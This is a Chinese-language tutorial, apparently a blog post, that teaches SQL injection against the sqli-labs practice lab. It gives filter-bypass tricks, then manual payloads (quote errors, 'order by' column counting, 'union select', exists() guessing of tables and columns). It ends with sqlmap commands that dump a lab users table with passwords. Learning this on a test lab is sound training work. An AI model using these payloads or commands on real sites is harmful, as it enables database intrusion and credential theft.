SQL注入

1.# 对应URL编码为%23，有时候直接输入#无法引掉后面内容

2.#对应SQL SERVER --对应MYSQL /** */为SQL注释

3.过滤空格时可用换行%0a

4.过滤\s时可用/**/表示空格

5.转自：http://hi.baidu.com/huting/item/628438b083f93455bb0e1278：

How to do sql injections with SQLMAP

  --------书写只是为了更好的思考

                                                                    

 By：PgHook

0x1 前面的废话

0x2 传统的手工

  第一步、判断是否存在注入点

  第二步、得到数据库的消息

0x3、sqlmap 传统用法

  1、枚举数据库

  2、列出数据库中数据表

  3、列出users表中字段

  4、得到字段里面的内容

0x4、sqlmap高级的用法（呵呵！其实也不怎么高级啦）

0x1 前面的废话

   好无聊啊！好久没有在博客上发表文字了，都快废了。我还是鼓起勇气，写篇扫盲吧！

呵呵！很久没写博客了，只是为了让博客继续下去，大牛绕道啊！关键看后面啊！前面

是自己的总结。

0x2 传统的手工     

 

目标是http://testphp.vulnweb.com/listproducts.php?cat=1

专门供测试学习用的，我这里不用这个了，访问速度太慢了。

我用的是sqli-labs-master网上有源码，大家可以去下载下来。

它也是专门供测试人员学习用的。

     这个是我的目标：http://192.168.2.214/sqli-labs-master/Less-2/?id=1

 

第一步、判断是否存在注入点  废话部分

方法一、‘

     一般都是在url后面加个’（http://192.168.2.214/sqli-labs-master/Less-2/?id=1’），让sql语句出错，那么页面就会提示出错信息。这个时候我们就可以判断这里存在注入。

当然还有可能你加了’，和没加是一样的，这也有可能是注入。因为当把错误提示关闭时，它是不会再页面显示的，这个时候我们就需要用到第二种方法了。

     

方法二、and 1=1/2

     如下：

     http://192.168.2.214/sqli-labs-master/Less-2/?id=1and 1=1  

     http://192.168.2.214/sqli-labs-master/Less-2/?id=1and 1=2

     如果第一个页面显示和原来一样，第二个页面和原来不一样就说明存在注入了。

实战部分：

     http://192.168.2.214/sqli-labs-master/Less-2/?id=1’

提交上去报错了

    Youhave an error in your SQL syntax; check the manual that corresponds to yourMySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

  

报错了。

 

 

第二步、得到数据库的信息

1、猜解字段数目

     这里要用到order by语句了，很多人都知道order by 猜解字段数目用的。

在sql语言中order by 是排序用的，它可以根据你表里面的字段来排序（默认

是升序，当然你也可以用DESC关键字进行降序排列）。

 

在猜解的时候order by x后面我们都是接的数字。你知道那个数字x是什么意思么？？

意思根据第x歌字段的长度（大小）来排序。

    

如果我只有3个字段，你在orderby 后面加个4，成了order by 4

那你说会怎么样了？？毫无疑问，肯定要报错啦！这样我们就猜出来了

字段的数目了

   

   http://192.168.2.214/sqli-labs-master/Less-2/?id=1order by x

这里这个x是一个数字，如果输入x页面报错，x-1页面正常。

那说明有x-1个字段

 

  我这里输入4的时候报错了http://192.168.2.214/sqli-labs-master/Less-2/?id=1order by 4

      Unknowncolumn '4' in 'order clause'

  输入3时，页面正常。那说明字段是3啦！

 

 

2、使用联合查询获取敏感信息

  这里使用到的是union操作符，它用于合并两个或多个select语句的结果集。

注意：union内部的select语句必须拥有相同数量的字段。字段也必须有相同的数据

类型。

  上面我们已经知道字段数目，就开始吧！

实战

http://192.168.2.214/sqli-labs-master/Less-2/?id=1and 1=2 union select 1,2,3

 

Welcome   Dhakkan 
Your Login name:2
Your Password:3

 

 

http://192.168.2.214/sqli-labs-master/Less-2/?id=1and 1=2 union select 1,user(),version()

 

Welcome   Dhakkan 
Your Login name:root@localhost
Your Password:5.0.51a-3ubuntu5

 

A1、猜解表名

and 1=2 and exists(select * from 表名)

 

http://192.168.2.214/sqli-labs-master/Less-2/?id=1and 1=2 and exists(select * from admin)

 

Welcome   Dhakkan 
Table 'security.admin' doesn't exist

看见没这个table不存在。

 

http://192.168.2.214/sqli-labs-master/Less-2/?id=1and 1=2 and exists(select * from users)

 

Welcome   Dhakkan 
Your Login name:Dumb
Your Password:Dumb

 

页面正常，说明存在该表。

 

A2、猜解字段

and 1=2 and exists(select 字段名from 表名)

 

http://192.168.2.214/sqli-labs-master/Less-2/?id=1and exists(select user from users)

 

Welcome   Dhakkan 
Unknown column 'user' in 'field list'

 

http://192.168.2.214/sqli-labs-master/Less-2/?id=1and exists(select username from users)

 

Welcome   Dhakkan 
Your Login name:Dumb
Your Password:Dumb

 

页面正常，说明存在该字段

这里我就不一一试了，得到了username。

 

A3、使用union得到数据

http://192.168.2.214/sqli-labs-master/Less-2/?id=1and 2=1 union select 1,password,3 from users

 

Welcome   Dhakkan 
Your Login name:Dumb
Your Password:3

 

 

0x3、sqlmap 传统用法1、枚举数据库

python sqlmap.py -uhttp://192.168.2.214/sqli-labs-master/Less-2/?id=1 --dbs

available databases [14]:

[*] information_schema

[*] metasploit

[*] my_db

[*] mysql

[*] owasp10

[*] security

 

2、列出数据库中数据表

python sqlmap.py -u http://192.168.2.214/sqli-labs-master/Less-2/?id=1–D security --tables

Database: security

[4 tables]

+----------+

| emails  |

| referers |

| uagents |

| users   |

+----------+

 

3、列出users表中字段

python sqlmap.py -u http://192.168.2.214/sqli-labs-master/Less-2/?id=1-D security -T users –columns

 

Database: security

Table: users

[3 columns]

+----------+-------------+

| Column  | Type        |

+----------+-------------+

| id      | int(3)      |

| password | varchar(20) |

| username | varchar(20) |

+----------+-------------+

 

 

4、得到字段里面的内容

python sqlmap.py -u http://192.168.2.214/sqli-labs-master/Less-2/?id=1-D security -T users -C id,password,username –dump

 

Database: security

Table: users

[13 entries]

+----+----------+------------+

| id | username | password   |

+----+----------+------------+

| 1 | Dumb     | Dumb       |

| 2 | Angelina | I-kill-you |

| 3 | Dummy    | p@ssword   |

| 4 | secure   | crappy     |

| 5 | stupid   | stupidity  |

| 6 | superman | genious    |

| 7 | batman   | mob!le     |

| 8 | admin    | admin      |

| 9 | admin1   | admin1     |

| 10 | admin2   | admin2    |

| 11 | admin3   | admin3    |

| 12 | dhakkan  | dumbo     |

| 14 | admin4   | admin4    |

+----+----------+------------+

 

 

 

当然这上面写的应该是比较规矩的做法，当然你也可以有不规矩的做法啦！

 

 

0x4、sqlmap高级的用法（呵呵！其实也不怎么高级啦）

   

python sqlmap.py -c sqlmap.conf –dbs

 

available databases [14]:

[*] bWAPP

[*] dvwa

[*] exercises

[*] hehe

[*] heihei

[*] information_schema

[*] metasploit

[*] my_db

[*] mysql

[*] owasp10

[*] security

[*] sqlol

[*] tikiwiki

[*] tikiwiki195

 

这里其实就是利用sqlmap里面的sqlmap.conf文件，

在这个文件中你可以添加参数，这是个很有内涵的文件，里面的奥秘期待你来揭开。

 

哈哈！我这里就不再继续了。